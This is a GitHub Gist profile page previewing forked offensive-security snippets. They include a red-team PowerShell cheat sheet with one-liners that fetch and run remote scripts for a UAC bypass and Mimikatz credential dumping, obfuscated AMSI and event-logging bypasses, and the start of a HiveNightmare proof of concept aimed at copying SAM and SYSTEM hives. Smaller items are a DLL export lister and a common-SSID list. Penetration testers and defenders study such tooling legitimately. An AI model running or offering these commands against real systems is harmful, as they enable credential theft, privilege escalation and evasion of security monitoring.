Skip to content

Instantly share code, notes, and snippets.

View HellishPn's full-sized avatar

Mohammad Hassan Pezeshkian HellishPn

11 followers · 22 following
View GitHub Profile
@HellishPn
HellishPn / All-Mal-Dev.md
Created April 7, 2025 08:21 — forked from 0prrr/All-Mal-Dev.md
Malware Dev Reading List
@HellishPn
HellishPn / RedTeam_CheatSheet.ps1
Created March 2, 2024 07:13 — forked from jivoi/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@HellishPn
HellishPn / powershell-bypasses.ps1
Created February 7, 2024 20:48 — forked from reigningshells/powershell-bypasses.ps1
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@HellishPn
HellishPn / Invoke-HiveNightmare.ps1
Last active February 7, 2024 20:47 — forked from reigningshells/Invoke-HiveNightmare.ps1
Super simple PowerShell PoC for HiveNightmare / SeriousSam that copies SAM and SYSTEM hive shadow copies to C:\Users\Public\Documents
function Invoke-HiveNightmare
{
if(((Get-Acl -LiteralPath C:\Windows\System32\config\sam).Access | where{($_.IdentityReference -eq "BUILTIN\Users") -and ($_.FileSystemRights -like "*Read*")}).Count -gt 0)
{
Write-Output "[*] VULNERABLE - BUILTIN\Users have Read access on C:\Windows\System32\config\sam"
}
else
{
Write-Output "[!] BUILTIN\Users do not have Read access on C:\Windows\System32\config\sam but may on volume shadow copies"
}
@HellishPn
HellishPn / DllExportLister.cs
Created February 7, 2024 20:47 — forked from reigningshells/DllExportLister.cs
Simple C# program to list exports of 32 and 64 bit DLLs - output mirrored from dumpbin /exports
using System;
using System.Linq;
using System.Runtime.InteropServices;
namespace DLLExportLister
{
class Program
{
// Can't use sizeof for IMAGE_SECTION_HEADER because of unmanaged type
public const int SizeOfImageSectionHeader = 40;
@HellishPn
HellishPn / commonssids.txt
Created July 23, 2022 10:39 — forked from jgamblin/commonssids.txt
5000 most of common SSID names from https://wigle.net/stats#ssidstats
ssid
xfinitywifi
linksys
<no ssid>
BTWiFi-with-FON
NETGEAR
Ziggo
dlink
BTWifi-X
default